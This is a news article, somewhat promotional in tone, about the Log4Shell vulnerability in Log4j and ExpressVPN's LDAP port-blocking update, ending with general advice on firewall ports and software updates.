ExpressVPN delivers protection from Log4Shell vulnerability
Over the last few days, it has become clear that the critical vulnerability found in the Java logging package Log4j and known as Log4Shell may very well be the worst cyber security flaw over the last decade.
While there are no universal remedies for the vulnerability yet, ExpressVPN has released an update for their VPN app to try and help mitigate the damage.
What is the Log4Shell vulnerability?
The Log4Shell vulnerability was first discovered by LunaSec in Microsoft’s Minecraft. The vulnerability allowed to get access to Minecraft’s servers by simply inputting malicious code in the in-game chatbox.
The zero-day attack vulnerability allows malicious attackers to execute any kind of code or command on a remote computer. This allows attackers to steal information, access credentials, install malware, create backdoors, even take full control over a target that’s using the system.
Perhaps the biggest threat is the popularity of Log4j itself. Its ubiquitous presence in many online services leaves millions of major companies exposed to potentially devastating attacks. The ever-growing list of vulnerable companies includes Cisco, IBM, Tesla, Twitter, Apple iCloud, Cloudflare, Siemens, and millions more.
At the same time, hackers from all over the world are launching no less than 100 times per minute to try and exploit the Apache log4j2 vulnerability. Over 1.2 million attacks have been launched since the bug was made public on Friday, December 10th. Some of the hackers are even considered to be Chinese state-backed groups, targeting US enterprises.
The number of IP addresses scanning the Internet for Log4Shell vulnerability has increased 100 times since Friday and keeps growing. All the while, companies are scrambling to fix the issue before it’s too late.
ExpressVPN releases an update to its VPN to protect against Log4Shell vulnerability
On December 14th ExpressVPN released an update to its VPN app that is meant to add a layer of protection from the Log4Shell flaw.
While the vulnerability did not affect the provider itself, ExpressVPN recognized that a lot of the applications their customers were using might be subject to attacks. The update aims to add an extra layer of protection from the vulnerability, to try to at least minimize the damage.
How does the ExpressVPN patch work?
As ExpressVPN’s Chief Architect, Peter Membrey, puts it, they have identified the Log4Shell vulnerability as either an LDAP port-based one or a Java RMI-reliant one. ExpressVPN chose to tackle the former.
In a situation where every second matters, the reason is simple: speed.
“We implemented the port-based blocking solution immediately as it was the fastest solution to bring to market, and responding at speed was crucial to minimize the impact of this vulnerability globally. However, we will continue to work on the packet-based approach and plan to roll it out as soon as it is ready and we are confident we can do it client-side with no negative privacy impacts.”
The ExpressVPN LDAP port patch is already live across all ExpressVPN servers. All the user has to do is keep the VPN on.
Is this the solution to the issue?
While ExpressVPN definitely deserves praise for moving so fast in a time of need, their port patch is no remedy. While port blocking can prevent certain kinds of Log4Shell attacks, it cannot prevent most of them, as well as the direst and most sophisticated ones.
In all fairness, the experts at ExpressVPN do not claim for their solution to be the best one:
“To be clear, this is not a silver bullet, but it will make a significant impact on protecting internet users. The nature of this vulnerability means that just being cybersecurity-savvy won’t protect you from it—especially if you use platforms that allow chat, like Minecraft, or other gaming or social platforms.”
So the ExpressVPN port-based solution is an extra layer of protection that can help fend off some of the attacks. The focus of this solution is the end-user, the ExpressVPN consumer who can become collateral damage in the ongoing war of the world against the hackers trying to exploit the newfound weakness. Enterprises require much more sophisticated means of defense.
Additional measures of protection against the vulnerability
Apart from getting ExpressVPN, and using it at all times until more universal means of Log4Shell vulnerability becomes available, here are a few other ways you can protect yourself as the user:
- Update your firewall settings to block any outbound traffic on ports that you would not usually use, but those that are known to be used by Log4Shell (those are: RMI-1099, LDAP – 389, 636, 1389, 3268, 3269, and others)
- Chances are, the software you are using on your device is vulnerable to the Log4j bug. Turn on auto-updates for all of your apps and programs, and update your software as soon as a security update becomes available.
- Continue monitoring updates on the understanding of the issue, its possible exploits, as well as ways to fight against it.
We will keep you updated on the latest developments with Log4j, as well as ways to protect yourself against it.